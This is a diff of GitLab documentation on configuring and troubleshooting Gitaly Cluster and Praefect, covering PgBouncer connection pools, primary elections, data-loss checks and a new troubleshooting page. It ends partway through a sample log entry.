Omnibus is configured to use [`auth_query`](https://www.pgbouncer.org/config.html#generic-settings) + and uses `pg_shadow_lookup` function. You need to create this function in `praefect_production` + database: ```sql - CREATE DATABASE praefect_production WITH ENCODING=UTF8; + CREATE OR REPLACE FUNCTION public.pg_shadow_lookup(in i_username text, out username text, out password text) RETURNS record AS $$ + BEGIN + SELECT usename, passwd FROM pg_catalog.pg_shadow + WHERE usename = i_username INTO username, password; + RETURN; + END; + $$ LANGUAGE plpgsql SECURITY DEFINER; + + REVOKE ALL ON FUNCTION public.pg_shadow_lookup(text) FROM public, pgbouncer; + GRANT EXECUTE ON FUNCTION public.pg_shadow_lookup(text) TO pgbouncer; ``` The database used by Praefect is now configured. If you see Praefect database errors after configuring PostgreSQL, see -[troubleshooting steps](index.md#relation-does-not-exist-errors). +[troubleshooting steps](troubleshooting.md#relation-does-not-exist-errors). -#### PgBouncer +#### Use PgBouncer To reduce PostgreSQL resource consumption, we recommend setting up and configuring [PgBouncer](https://www.pgbouncer.org/) in front of the PostgreSQL instance. To do -this, set the corresponding IP or host address of the PgBouncer instance in -`/etc/gitlab/gitlab.rb` by changing the following settings: +this, you must point Praefect to PgBouncer by setting Praefect database parameters: -- `praefect['database_host']`, for the address. -- `praefect['database_port']`, for the port. +```ruby +praefect['database_host'] = PGBOUNCER_HOST +praefect['database_port'] = 6432 +praefect['database_user'] = 'praefect' +praefect['database_password'] = PRAEFECT_SQL_PASSWORD +praefect['database_dbname'] = 'praefect_production' +#praefect['database_sslmode'] = '...' +#praefect['database_sslcert'] = '...' +#praefect['database_sslkey'] = '...' +#praefect['database_sslrootcert'] = '...' +``` -Because PgBouncer manages resources more efficiently, Praefect still requires a -direct connection to the PostgreSQL database. It uses the -[LISTEN](https://www.postgresql.org/docs/11/sql-listen.html) -feature that is [not supported](https://www.pgbouncer.org/features.html) by -PgBouncer with `pool_mode = transaction`. -Set `praefect['database_host_no_proxy']` and `praefect['database_port_no_proxy']` -to a direct connection, and not a PgBouncer connection. +Praefect requires an additional connection to the PostgreSQL that supports the +[LISTEN](https://www.postgresql.org/docs/11/sql-listen.html) feature. With PgBouncer +this feature is only available with `session` pool mode (`pool_mode = session`). +It is not supported in `transaction` pool mode (`pool_mode = transaction`). -Save the changes to `/etc/gitlab/gitlab.rb` and -[reconfigure Praefect](../restart_gitlab.md#omnibus-gitlab-reconfigure). +For the additional connection, you must either: -This documentation doesn't provide PgBouncer installation instructions, -but you can: +- Connect Praefect directly to PostgreSQL and bypass PgBouncer. +- Configure a new PgBouncer database that uses to the same PostgreSQL database endpoint, + but with different pool mode. That is, `pool_mode = session`. -- Find instructions on the [official website](https://www.pgbouncer.org/install.html). -- Use a [Docker image](https://hub.docker.com/r/edoburu/pgbouncer/). +Praefect can be configured to use different connection parameters for direct access +to PostgreSQL. This is the connection that supports the `LISTEN` feature. -In addition to the base PgBouncer configuration options, set the following values in -your `pgbouncer.ini` file: +Here is an example of Praefect that bypasses PgBouncer and directly connects to PostgreSQL: -- The [Praefect PostgreSQL database](#postgresql) in the `[databases]` section: +```ruby +praefect['database_direct_host'] = POSTGRESQL_HOST +praefect['database_direct_port'] = 5432 + +# Use the following to override parameters of direct database connection. +# Comment out where the parameters are the same for both connections. + +praefect['database_direct_user'] = 'praefect' +praefect['database_direct_password'] = PRAEFECT_SQL_PASSWORD +praefect['database_direct_dbname'] = 'praefect_production' +#praefect['database_direct_sslmode'] = '...' +#praefect['database_direct_sslcert'] = '...' +#praefect['database_direct_sslkey'] = '...' +#praefect['database_direct_sslrootcert'] = '...' +``` - ```ini - [databases] - * = host=POSTGRESQL_SERVER_ADDRESS port=5432 auth_user=praefect - ``` +We recommend using PgBouncer with `session` pool mode instead. You can use the [bundled +PgBouncer](../postgresql/pgbouncer.md) or use an external PgBouncer and [configure it +manually](https://www.pgbouncer.org/config.html). -- [`pool_mode`](https://www.pgbouncer.org/config.html#pool_mode) - and [`ignore_startup_parameters`](https://www.pgbouncer.org/config.html#ignore_startup_parameters) - in the `[pgbouncer]` section: +The following example uses the bundled PgBouncer and sets up two separate connection pools, +one in `session` pool mode and the other in `transaction` pool mode. For this example to work, +you need to prepare PostgreSQL server with [setup instruction](#manual-database-setup): - ```ini - [pgbouncer] - pool_mode = transaction - ignore_startup_parameters = extra_float_digits - ``` +```ruby +pgbouncer['databases'] = { + # Other database configuation including gitlabhq_production + ... + + praefect_production: { + host: POSTGRESQL_HOST, + # Use `pgbouncer` user to connect to database backend. + user: 'pgbouncer', + password: PGBOUNCER_SQL_PASSWORD_HASH, + pool_mode: 'transaction' + } + praefect_production_direct: { + host: POSTGRESQL_HOST, + # Use `pgbouncer` user to connect to database backend. + user: 'pgbouncer', + password: PGBOUNCER_SQL_PASSWORD_HASH, + dbname: 'praefect_production', + pool_mode: 'session' + }, + + ... +} +``` + +Both `praefect_production` and `praefect_production_direct` use the same database endpoint +(`praefect_production`), but with different pool modes. This translates to the following +`databases` section of PgBouncer: -The `praefect` user and its password should be included in the file (default is -`userlist.txt`) used by PgBouncer if the [`auth_file`](https://www.pgbouncer.org/config.html#auth_file) -configuration option is set. +```ini +[databases] +praefect_production = host=POSTGRESQL_HOST auth_user=pgbouncer pool_mode=transaction +praefect_production_direct = host=POSTGRESQL_HOST auth_user=pgbouncer dbname=praefect_production pool_mode=session +``` + +Now you can configure Praefect to use PgBouncer for both connections: + +```ruby +praefect['database_host'] = PGBOUNCER_HOST +praefect['database_port'] = 6432 +praefect['database_user'] = 'praefect' +# `PRAEFECT_SQL_PASSWORD` is the plain-text password of +# Praefect user. Not to be confused with `PRAEFECT_SQL_PASSWORD_HASH`. +praefect['database_password'] = PRAEFECT_SQL_PASSWORD + +praefect['database_dbname'] = 'praefect_production' +praefect['database_direct_dbname'] = 'praefect_production_direct' + +# There is no need to repeat the following. Parameters of direct +# database connection will fall back to the values above. + +#praefect['database_direct_host'] = PGBOUNCER_HOST +#praefect['database_direct_port'] = 6432 +#praefect['database_direct_user'] = 'praefect' +#praefect['database_direct_password'] = PRAEFECT_SQL_PASSWORD +``` + +With this configuration, Praefect uses PgBouncer for both connection types. NOTE: -By default PgBouncer uses port `6432` to accept incoming -connections. You can change it by setting the [`listen_port`](https://www.pgbouncer.org/config.html#listen_port) -configuration option. We recommend setting it to the default port value (`5432`) used by -PostgreSQL instances. Otherwise you should change the configuration parameter -`praefect['database_port']` for each Praefect instance to the correct value. +Omnibus GitLab handles the authentication requirements (using `auth_query`), but if you are preparing +your databases manually and configuring an external PgBouncer, you must include `praefect` user and +its password in the file used by PgBouncer. For example, `userlist.txt` if the [`auth_file`](https://www.pgbouncer.org/config.html#auth_file) +configuration option is set. For more details, consult the PgBouncer documentation. ### Praefect @@ -241,17 +334,10 @@ If there are multiple Praefect nodes: To complete this section you need a [configured PostgreSQL server](#postgresql), including: -- IP/host address (`POSTGRESQL_SERVER_ADDRESS`) -- Password (`PRAEFECT_SQL_PASSWORD`) - Praefect should be run on a dedicated node. Do not run Praefect on the application server, or a Gitaly node. -1. SSH into the **Praefect** node and login as root: - - ```shell - sudo -i - ``` +On the **Praefect** node: 1. Disable all other services by editing `/etc/gitlab/gitlab.rb`: @@ -295,22 +381,8 @@ application server, or a Gitaly node. praefect['auth_token'] = 'PRAEFECT_EXTERNAL_TOKEN' ``` -1. Configure **Praefect** to connect to the PostgreSQL database by editing - `/etc/gitlab/gitlab.rb`. - - You need to replace `POSTGRESQL_SERVER_ADDRESS` with the IP/host address - of the database, and `PRAEFECT_SQL_PASSWORD` with the strong password set - above. - - ```ruby - praefect['database_host'] = 'POSTGRESQL_SERVER_ADDRESS' - praefect['database_port'] = 5432 - praefect['database_user'] = 'praefect' - praefect['database_password'] = 'PRAEFECT_SQL_PASSWORD' - praefect['database_dbname'] = 'praefect_production' - praefect['database_host_no_proxy'] = 'POSTGRESQL_SERVER_ADDRESS' - praefect['database_port_no_proxy'] = 5432 - ``` +1. Configure **Praefect** to [connect to the PostgreSQL database](#postgresql). We + highly recommend using [PgBouncer](#use-pgbouncer) as well. If you want to use a TLS client certificate, the options below can be used: @@ -507,7 +579,7 @@ To configure Praefect with TLS: ```ruby git_data_dirs({ "default" => { - "gitaly_address" => 'tls://LOAD_BALANCER_SERVER_ADDRESS:2305', + "gitaly_address" => 'tls://PRAEFECT_LOADBALANCER_HOST:2305', "gitaly_token" => 'PRAEFECT_EXTERNAL_TOKEN' } }) @@ -544,7 +616,7 @@ To configure Praefect with TLS: repositories: storages: default: - gitaly_address: tls://LOAD_BALANCER_SERVER_ADDRESS:3305 + gitaly_address: tls://PRAEFECT_LOADBALANCER_HOST:3305 path: /some/local/path ``` @@ -817,7 +889,7 @@ Particular attention should be shown to: You need to replace: - - `LOAD_BALANCER_SERVER_ADDRESS` with the IP address or hostname of the load + - `PRAEFECT_LOADBALANCER_HOST` with the IP address or hostname of the load balancer. - `PRAEFECT_EXTERNAL_TOKEN` with the real secret @@ -826,7 +898,7 @@ Particular attention should be shown to: ```ruby git_data_dirs({ "default" => { - "gitaly_address" => "tcp://LOAD_BALANCER_SERVER_ADDRESS:2305", + "gitaly_address" => "tcp://PRAEFECT_LOADBALANCER_HOST:2305", "gitaly_token" => 'PRAEFECT_EXTERNAL_TOKEN' } }) @@ -926,7 +998,7 @@ For example: git_data_dirs({ 'default' => { 'gitaly_address' => 'tcp://old-gitaly.internal:8075' }, 'cluster' => { - 'gitaly_address' => 'tcp://<load_balancer_server_address>:2305', + 'gitaly_address' => 'tcp://<PRAEFECT_LOADBALANCER_HOST>:2305', 'gitaly_token' => '<praefect_external_token>' } }) @@ -981,6 +1053,26 @@ To get started quickly: Congratulations! You've configured an observable fault-tolerant Praefect cluster. +## Network connectivity requirements + +Gitaly Cluster components need to communicate with each other over many routes. +Your firewall rules must allow the following for Gitaly Cluster to function properly: + +| From | To | Default port / TLS port | +|:-----------------------|:------------------------|:------------------------| +| GitLab | Praefect load balancer | `2305` / `3305` | +| Praefect load balancer | Praefect | `2305` / `3305` | +| Praefect | Gitaly | `8075` / `9999` | +| Gitaly | GitLab (internal API) | `80` / `443` | +| Gitaly | Praefect load balancer | `2305` / `3305` | +| Gitaly | Praefect | `2305` / `3305` | +| Gitaly | Gitaly | `8075` / `9999` | + +NOTE: +Gitaly does not directly connect to Praefect. However, requests from Gitaly to the Praefect +load balancer may still be blocked unless firewalls on the Praefect nodes allow traffic from +the Gitaly nodes. + ## Distributed reads > - Introduced in GitLab 13.1 in [beta](https://about.gitlab.com/handbook/product/gitlab-the-product/#alpha-beta-ga) with feature flag `gitaly_distributed_reads` set to disabled. @@ -1147,24 +1239,30 @@ The `per_repository` election strategy solves this problem by electing a primary repository. Combined with [configurable replication factors](#configure-replication-factor), you can horizontally scale storage capacity and distribute write load across Gitaly nodes. -Primary elections are run when: +Primary elections are run: -- Praefect starts up. -- The cluster's consensus of a Gitaly node's health changes. +- In GitLab 14.1 and later, lazily. This means that Praefect doesn't immediately elect + a new primary node if the current one is unhealthy. A new primary is elected if it is + necessary to serve a request while the current primary is unavailable. +- In GitLab 13.12 to GitLab 14.0 when: + - Praefect starts up. + - The cluster's consensus of a Gitaly node's health changes. -A Gitaly node is considered: +A valid primary node candidate is a Gitaly node that: -- Healthy if `>=50%` Praefect nodes have successfully health checked the Gitaly node in the - previous ten seconds. -- Unhealthy otherwise. +- Is healthy. A Gitaly node is considered healthy if `>=50%` Praefect nodes have + successfully health checked the Gitaly node in the previous ten seconds. +- Has a fully up to date copy of the repository. -During an election run, Praefect elects a new primary Gitaly node for each repository that has -an unhealthy primary Gitaly node. The election is made: +If there are multiple primary node candidates, Praefect: -- Randomly from healthy secondary Gitaly nodes that are the most up to date. -- Only from Gitaly nodes assigned to the host repository. +- Picks one of them randomly. +- Prioritizes promoting a Gitaly node that is assigned to host the repository. If + there are no assigned Gitaly nodes to elect as the primary, Praefect may temporarily + elect an unassigned one. The unassigned primary is demoted in favor of an assigned + one when one becomes available. -If there are no healthy secondary nodes for a repository: +If there are no valid primary candidates for a repository: - The unhealthy primary node is demoted and the repository is left without a primary node. - Operations that require a primary node fail until a primary is successfully elected. @@ -1212,7 +1310,7 @@ To migrate existing clusters: - If downtime is unacceptable: - 1. Determine which Gitaly node is [the current primary](index.md#determine-primary-gitaly-node). + 1. Determine which Gitaly node is [the current primary](troubleshooting.md#determine-primary-gitaly-node). 1. Comment out the secondary Gitaly nodes from the virtual storage's configuration in `/etc/gitlab/gitlab.rb` on all Praefect nodes. This ensures there's only one Gitaly node configured, causing both of the election @@ -1259,23 +1357,37 @@ Migrate to [repository-specific primary nodes](#repository-specific-primary-node Gitaly Cluster recovers from a failing primary Gitaly node by promoting a healthy secondary as the new primary. -To minimize data loss, Gitaly Cluster: +In GitLab 14.1 and later, Gitaly Cluster: + +- Elects a healthy secondary with a fully up to date copy of the repository as the new primary. +- Repository becomes unavailable if there are no fully up to date copies of it on healthy secondaries. + +To minimize data loss in GitLab 13.0 to 14.0, Gitaly Cluster: - Switches repositories that are outdated on the new primary to [read-only mode](#read-only-mode). -- Elects the secondary with the least unreplicated writes from the primary to be the new primary. - Because there can still be some unreplicated writes, [data loss can occur](#check-for-data-loss). +- Elects the secondary with the least unreplicated writes from the primary to be the new + primary. Because there can still be some unreplicated writes, + [data loss can occur](#check-for-data-loss). ### Read-only mode > - Introduced in GitLab 13.0 as [generally available](https://about.gitlab.com/handbook/product/gitlab-the-product/#generally-available-ga). > - Between GitLab 13.0 and GitLab 13.2, read-only mode applied to the whole virtual storage and occurred whenever failover occurred. > - [In GitLab 13.3 and later](https://gitlab.com/gitlab-org/gitaly/-/issues/2862), read-only mode applies on a per-repository basis and only occurs if a new primary is out of date. +new primary. If the failed primary contained unreplicated writes, [data loss can occur](#check-for-data-loss). +> - Removed in GitLab 14.1. Instead, repositories [become unavailable](#unavailable-repositories). + +In GitLab 13.0 to 14.0, when Gitaly Cluster switches to a new primary, repositories enter +read-only mode if they are out of date. This can happen after failing over to an outdated +secondary. Read-only mode eases data recovery efforts by preventing writes that may conflict +with the unreplicated writes on other nodes. -When Gitaly Cluster switches to a new primary, repositories enter read-only mode if they are out of -date. This can happen after failing over to an outdated secondary. Read-only mode eases data -recovery efforts by preventing writes that may conflict with the unreplicated writes on other nodes. +When Gitaly Cluster switches to a new primary In GitLab 13.0 to 14.0, repositories enter +read-only mode if they are out of date. This can happen after failing over to an outdated +secondary. Read-only mode eases data recovery efforts by preventing writes that may conflict +with the unreplicated writes on other nodes. -To enable writes again, an administrator can: +To enable writes again in GitLab 13.0 to 14.0, an administrator can: 1. [Check](#check-for-data-loss) for data loss. 1. Attempt to [recover](#data-recovery) missing data. @@ -1283,21 +1395,38 @@ To enable writes again, an administrator can: [accept data loss](#enable-writes-or-accept-data-loss) if necessary, depending on the version of GitLab. +## Unavailable repositories + +> - From GitLab 13.0 through 14.0, repositories became read-only if they were outdated on the primary but fully up to date on a healthy secondary. `dataloss` sub-command displays read-only repositories by default through these versions. +> - Since GitLab 14.1, Praefect contains more responsive failover logic which immediately fails over to one of the fully up to date secondaries rather than placing the repository in read-only mode. Since GitLab 14.1, the `dataloss` sub-command displays repositories which are unavailable due to having no fully up to date copies on healthy Gitaly nodes. + +A repository is unavailable if all of its up to date replicas are unavailable. Unavailable repositories are +not accessible through Praefect to prevent serving stale data that may break automated tooling. + ### Check for data loss -The Praefect `dataloss` sub-command identifies replicas that are likely to be outdated. This can help -identify potential data loss after a failover. The following parameters are -available: +The Praefect `dataloss` subcommand identifies: + +- Copies of repositories in GitLab 13.0 to GitLab 14.0 that at are likely to be outdated. + This can help identify potential data loss after a failover. +- Repositories in GitLab 14.1 and later that are unavailable. This helps identify potential + data loss and repositories which are no longer accessible because all of their up-to-date + replicas copies are unavailable. + +The following parameters are available: -- `-virtual-storage` that specifies which virtual storage to check. The default behavior is to - display outdated replicas of read-only repositories as they might require administrator action. -- In GitLab 13.3 and later, `-partially-replicated` that specifies whether to display a list of - [outdated replicas of writable repositories](#outdated-replicas-of-writable-repositories). +- `-virtual-storage` that specifies which virtual storage to check. Because they might require + an administrator to intervene, the default behavior is to display: + - In GitLab 13.0 to 14.0, copies of read-only repositories. + - In GitLab 14.1 and later, unavailable repositories. +- In GitLab 14.1 and later, [`-partially-unavailable`](#unavailable-replicas-of-available-repositories) + that specifies whether to include in the output repositories that are available but have + some assigned copies that are not available. NOTE: `dataloss` is still in beta and the output format is subject to change. -To check for repositories with outdated primaries, run: +To check for repositories with outdated primaries or for unavailable repositories, run: ```shell sudo /opt/gitlab/embedded/bin/praefect -config /var/opt/gitlab/praefect/config.toml dataloss [-virtual-storage <virtual-storage>] @@ -1309,13 +1438,20 @@ Every configured virtual storage is checked if none is specified: sudo /opt/gitlab/embedded/bin/praefect -config /var/opt/gitlab/praefect/config.toml dataloss ``` -Repositories which have assigned storage nodes that contain an outdated copy of the repository are listed -in the output. This information is printed for each repository: +Repositories are listed in the output that have either: + +- An outdated copy of the repository on the primary, in GitLab 13.0 to GitLab 14.0. +- No healthy and fully up-to-date copies available, in GitLab 14.1 and later. + +The following information is printed for each repository: - A repository's relative path to the storage directory identifies each repository and groups the related information. -- The repository's current status is printed in parentheses next to the disk path. If the repository's primary - is outdated, the repository is in `read-only` mode and can't accept writes. Otherwise, the mode is `writable`. +- The repository's current status is printed in parentheses next to the disk path: + - In GitLab 13.0 to 14.0, either `(read-only)` if the repository's primary node is outdated + and can't accept writes. Otherwise, `(writable)`. + - In GitLab 14.1 and later, `(unavailable)` is printed next to the disk path if the + repository is unavailable. - The primary field lists the repository's current primary. If the repository has no primary, the field shows `No Primary`. - The In-Sync Storages lists replicas which have replicated the latest successful write and all writes @@ -1325,44 +1461,51 @@ in the output. This information is printed for each repository: is listed next to replica. It's important to notice that the outdated replicas may be fully up to date or contain later changes but Praefect can't guarantee it. -Whether a replica is assigned to host the repository is listed with each replica's status. `assigned host` is printed -next to replicas which are assigned to store the repository. The text is omitted if the replica contains a copy of -the repository but is not assigned to store the repository. Such replicas aren't kept in-sync by Praefect, but may -act as replication sources to bring assigned replicas up to date. +Additional information includes: + +- Whether a node is assigned to host the repository is listed with each node's status. + `assigned host` is printed next to nodes that are assigned to store the repository. The + text is omitted if the node contains a copy of the repository but is not assigned to store + the repository. Such copies aren't kept in sync by Praefect, but may act as replication + sources to bring assigned copies up to date. +- In GitLab 14.1 and later, `unhealthy` is printed next to the copies that are located + on unhealthy Gitaly nodes. Example output: ```shell Virtual storage: default Outdated repositories: - @hashed/3f/db/3fdba35f04dc8c462986c992bcf875546257113072a909c162f7e470e581e278.git (read-only): + @hashed/3f/db/3fdba35f04dc8c462986c992bcf875546257113072a909c162f7e470e581e278.git (unavailable): Primary: gitaly-1 In-Sync Storages: - gitaly-2, assigned host + gitaly-2, assigned host, unhealthy Outdated Storages: gitaly-1 is behind by 3 changes or less, assigned host gitaly-3 is behind by 3 changes or less ``` -A confirmation is printed out when every repository is writable. For example: +A confirmation is printed out when every repository is available. For example: ```shell Virtual storage: default - All repositories are writable! + All repositories are available! ``` -#### Outdated replicas of writable repositories +#### Unavailable replicas of available repositories -> [Introduced](https://gitlab.com/gitlab-org/gitaly/-/issues/3019) in GitLab 13.3. +NOTE: +In GitLab 14.0 and earlier, the flag is `-partially-replicated` and the output shows any repositories with assigned nodes with outdated +copies. -To also list information of repositories whose primary is up to date but one or more assigned -replicas are outdated, use the `-partially-replicated` flag. +To also list information of repositories which are available but are unavailable from some of the assigned nodes, +use the `-partially-unavailable` flag. -A repository is writable if the primary has the latest changes. Secondaries might be temporarily -outdated while they are waiting to replicate the latest changes. +A repository is available if there is a healthy, up to date replica available. Some of the assigned secondary +replicas may be temporarily unavailable for access while they are waiting to replicate the latest changes. ```shell -sudo /opt/gitlab/embedded/bin/praefect -config /var/opt/gitlab/praefect/config.toml dataloss [-virtual-storage <virtual-storage>] [-partially-replicated] +sudo /opt/gitlab/embedded/bin/praefect -config /var/opt/gitlab/praefect/config.toml dataloss [-virtual-storage <virtual-storage>] [-partially-unavailable] ``` Example output: @@ -1370,7 +1513,7 @@ Example output: ```shell Virtual storage: default Outdated repositories: - @hashed/3f/db/3fdba35f04dc8c462986c992bcf875546257113072a909c162f7e470e581e278.git (writable): + @hashed/3f/db/3fdba35f04dc8c462986c992bcf875546257113072a909c162f7e470e581e278.git: Primary: gitaly-1 In-Sync Storages: gitaly-1, assigned host @@ -1379,14 +1522,14 @@ Virtual storage: default gitaly-3 is behind by 3 changes or less ``` -With the `-partially-replicated` flag set, a confirmation is printed out if every assigned replica is fully up to -date. +With the `-partially-unavailable` flag set, a confirmation is printed out if every assigned replica is fully up to +date and healthy. For example: ```shell Virtual storage: default - All repositories are up to date! + All repositories are fully available on all assigned storages! ``` ### Check repository checksums @@ -1394,30 +1537,50 @@ Virtual storage: default To check a project's repository checksums across on all Gitaly nodes, run the [replicas Rake task](../raketasks/praefect.md#replica-checksums) on the main GitLab node. +### Accept data loss + +WARNING: +`accept-dataloss` causes permanent data loss by overwriting other versions of the repository. Data +[recovery efforts](#data-recovery) must be performed before using it. + +If it is not possible to bring one of the up to date replicas back online, you may have to accept data +loss. When accepting data loss, Praefect marks the chosen replica of the repository as the latest version +and replicates it to the other assigned Gitaly nodes. This process overwrites any other version of the +repository so care must be taken. + +```shell +sudo /opt/gitlab/embedded/bin/praefect -config /var/opt/gitlab/praefect/config.toml accept-dataloss +-virtual-storage <virtual-storage> -repository <relative-path> -authoritative-storage <storage-name> +``` + ### Enable writes or accept data loss -Praefect provides the following sub-commands to re-enable writes: +WARNING: +`accept-dataloss` causes permanent data loss by overwriting other versions of the repository. +Data [recovery efforts](#data-recovery) must be performed before using it. -- In GitLab 13.2 and earlier, `enable-writes` to re-enable virtual storage for writes after data - recovery attempts. +Praefect provides the following subcommands to re-enable writes or accept data loss: - ```shell - sudo /opt/gitlab/embedded/bin/praefect -config /var/opt/gitlab/praefect/config.toml enable-writes -virtual-storage <virtual-storage> - ``` +- In GitLab 13.2 and earlier, `enable-writes` to re-enable virtual storage for writes after + data recovery attempts: -- [In GitLab 13.3](https://gitlab.com/gitlab-org/gitaly/-/merge_requests/2415) and later, - `accept-dataloss` to accept data loss and re-enable writes for repositories after data recovery - attempts have failed. Accepting data loss causes current version of the repository on the - authoritative storage to be considered latest. Other storages are brought up to date with the - authoritative storage by scheduling replication jobs. + ```shell + sudo /opt/gitlab/embedded/bin/praefect -config /var/opt/gitlab/praefect/config.toml enable-writes -virtual-storage <virtual-storage> + ``` + +- In GitLab 13.3 and later, if it is not possible to bring one of the up to date nodes back + online, you may have to accept data loss: ```shell sudo /opt/gitlab/embedded/bin/praefect -config /var/opt/gitlab/praefect/config.toml accept-dataloss -virtual-storage <virtual-storage> -repository <relative-path> -authoritative-storage <storage-name> ``` -WARNING: -`accept-dataloss` causes permanent data loss by overwriting other versions of the repository. Data -[recovery efforts](#data-recovery) must be performed before using it. + When accepting data loss, Praefect: + + 1. Marks the chosen copy of the repository as the latest version. + 1. Replicates the copy to the other assigned Gitaly nodes. + + This process overwrites any other copy of the repository so care must be taken. ## Data recovery @@ -1463,10 +1626,7 @@ praefect['reconciliation_scheduling_interval'] = '0' # disable the feature ### Manual reconciliation WARNING: -The `reconcile` sub-command is deprecated and scheduled for removal in GitLab 14.0. Use -[automatic reconciliation](#automatic-reconciliation) instead. Manual reconciliation may -produce excess replication jobs and is limited in functionality. Manual reconciliation does -not work when [repository-specific primary nodes](#repository-specific-primary-nodes) are +The `reconcile` sub-command was removed in GitLab 14.1. Use [automatic reconciliation](#automatic-reconciliation) instead. Manual reconciliation may produce excess replication jobs and is limited in functionality. Manual reconciliation does not work when [repository-specific primary nodes](#repository-specific-primary-nodes) are enabled. The Praefect `reconcile` sub-command allows for the manual reconciliation between two Gitaly nodes. The @@ -1509,7 +1669,7 @@ After creating and configuring Gitaly Cluster: 1. Ensure all storages are accessible to the GitLab instance. In this example, these are `<original_storage_name>` and `<cluster_storage_name>`. 1. [Configure repository storage weights](../repository_storage_paths.md#configure-where-new-repositories-are-stored) - so that the Gitaly Cluster receives all new projects. This stops new projects being created + so that the Gitaly Cluster receives all new projects. This stops new projects from being created on existing Gitaly nodes while the migration is in progress. 1. Schedule repository moves for: - [Projects](#bulk-schedule-project-moves). diff --git a/doc/administration/gitaly/troubleshooting.md b/doc/administration/gitaly/troubleshooting.md new file mode 100644 index 00000000000..ab6f493cf0f --- /dev/null +++ b/doc/administration/gitaly/troubleshooting.md @@ -0,0 +1,372 @@ +--- +stage: Create +group: Gitaly +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +type: reference +--- + +# Troubleshooting Gitaly and Gitaly Cluster **(FREE SELF)** + +Refer to the information below when troubleshooting Gitaly and Gitaly Cluster. + +Before troubleshooting, see the Gitaly and Gitaly Cluster +[frequently asked questions](faq.md). + +## Troubleshoot Gitaly + +The following sections provide possible solutions to Gitaly errors. + +See also [Gitaly timeout](../../user/admin_area/settings/gitaly_timeouts.md) settings. + +### Check versions when using standalone Gitaly servers + +When using standalone Gitaly servers, you must make sure they are the same version +as GitLab to ensure full compatibility: + +1. On the top bar, select **Menu >** **{admin}** **Admin** on your GitLab instance. +1. On the left sidebar, select **Overview > Gitaly Servers**. +1. Confirm all Gitaly servers indicate that they are up to date. + +### Use `gitaly-debug` + +The `gitaly-debug` command provides "production debugging" tools for Gitaly and Git +performance. It is intended to help production engineers and support +engineers investigate Gitaly performance problems. + +If you're using GitLab 11.6 or newer, this tool should be installed on +your GitLab or Gitaly server already at `/opt/gitlab/embedded/bin/gitaly-debug`. +If you're investigating an older GitLab version you can compile this +tool offline and copy the executable to your server: + +```shell +git clone https://gitlab.com/gitlab-org/gitaly.git +cd cmd/gitaly-debug +GOOS=linux GOARCH=amd64 go build -o gitaly-debug +``` + +To see the help page of `gitaly-debug` for a list of supported sub-commands, run: + +```shell +gitaly-debug -h +``` + +### Commits, pushes, and clones return a 401 + +```plaintext +remote: GitLab: 401 Unauthorized +``` + +You need to sync your `gitlab-secrets.json` file with your GitLab +application nodes. + +### Client side gRPC logs + +Gitaly uses the [gRPC](https://grpc.io/) RPC framework. The Ruby gRPC +client has its own log file which may contain useful information when +you are seeing Gitaly errors. You can control the log level of the +gRPC client with the `GRPC_LOG_LEVEL` environment variable. The +default level is `WARN`. + +You can run a gRPC trace with: + +```shell +sudo GRPC_TRACE=all GRPC_VERBOSITY=DEBUG gitlab-rake gitlab:gitaly:check +``` + +### Server side gRPC logs + +gRPC tracing can also be enabled in Gitaly itself with the `GODEBUG=http2debug` +environment variable. To set this in an Omnibus GitLab install: + +1. Add the following to your `gitlab.rb` file: + + ```ruby + gitaly['env'] = { + "GODEBUG=http2debug" => "2" + } + ``` + +1. [Reconfigure](../restart_gitlab.md#omnibus-gitlab-reconfigure) GitLab. + +### Correlating Git processes with RPCs + +Sometimes you need to find out which Gitaly RPC created a particular Git process. + +One method for doing this is by using `DEBUG` logging. However, this needs to be enabled +ahead of time and the logs produced are quite verbose. + +A lightweight method for doing this correlation is by inspecting the environment +of the Git process (using its `PID`) and looking at the `CORRELATION_ID` variable: + +```shell +PID=<Git process ID> +sudo cat /proc/$PID/environ | tr '\0' '\n' | grep ^CORRELATION_ID= +``` + +This method isn't reliable for `git cat-file` processes, because Gitaly +internally pools and re-uses those across RPCs. + +### Observing `gitaly-ruby` traffic + +[`gitaly-ruby`](configure_gitaly.md#gitaly-ruby) is an internal implementation detail of Gitaly, +so, there's not that much visibility into what goes on inside +`gitaly-ruby` processes. + +If you have Prometheus set up to scrape your Gitaly process, you can see +request rates and error codes for individual RPCs in `gitaly-ruby` by +querying `grpc_client_handled_total`. + +- In theory, this metric does not differentiate between `gitaly-ruby` and other RPCs. +- In practice from GitLab 11.9, all gRPC calls made by Gitaly itself are internal calls from the + main Gitaly process to one of its `gitaly-ruby` sidecars. + +Assuming your `grpc_client_handled_total` counter only observes Gitaly, +the following query shows you RPCs are (most likely) internally +implemented as calls to `gitaly-ruby`: + +```prometheus +sum(rate(grpc_client_handled_total[5m])) by (grpc_method) > 0 +``` + +### Repository changes fail with a `401 Unauthorized` error + +If you run Gitaly on its own server and notice these conditions: + +- Users can successfully clone and fetch repositories by using both SSH and HTTPS. +- Users can't push to repositories, or receive a `401 Unauthorized` message when attempting to + make changes to them in the web UI. + +Gitaly may be failing to authenticate with the Gitaly client because it has the +[wrong secrets file](configure_gitaly.md#configure-gitaly-servers). + +Confirm the following are all true: + +- When any user performs a `git push` to any repository on this Gitaly server, it + fails with a `401 Unauthorized` error: + + ```shell + remote: GitLab: 401 Unauthorized + To <REMOTE_URL> + ! [remote rejected] branch-name -> branch-name (pre-receive hook declined) + error: failed to push some refs to '<REMOTE_URL>' + ``` + +- When any user adds or modifies a file from the repository using the GitLab + UI, it immediately fails with a red `401 Unauthorized` banner. +- Creating a new project and [initializing it with a README](../../user/project/working_with_projects.md#blank-projects) + successfully creates the project but doesn't create the README. +- When [tailing the logs](https://docs.gitlab.com/omnibus/settings/logs.html#tail-logs-in-a-console-on-the-server) + on a Gitaly client and reproducing the error, you get `401` errors + when reaching the [`/api/v4/internal/allowed`](../../development/internal_api.md) endpoint: + + ```shell + # api_json.log + { + "time": "2019-07-18T00:30:14.967Z", + "severity": "INFO", + "duration": 0.57, + "db": 0, + "view": 0.57, + "status": 401, + "method": "POST", + "path": "\/api\/v4\/internal\/allowed", + "params": [ + { + "key": "action", + "value": "git-receive-pack" + }, + { + "key": "changes", + "value": "REDACTED" + }, + { + "key": "gl_repository", + "value": "REDACTED" + }, + { + "key": "project", + "value": "\/path\/to\/project.git" + }, + { + "key": "protocol", + "value": "web" + }, + { + "key": "env", + "value": 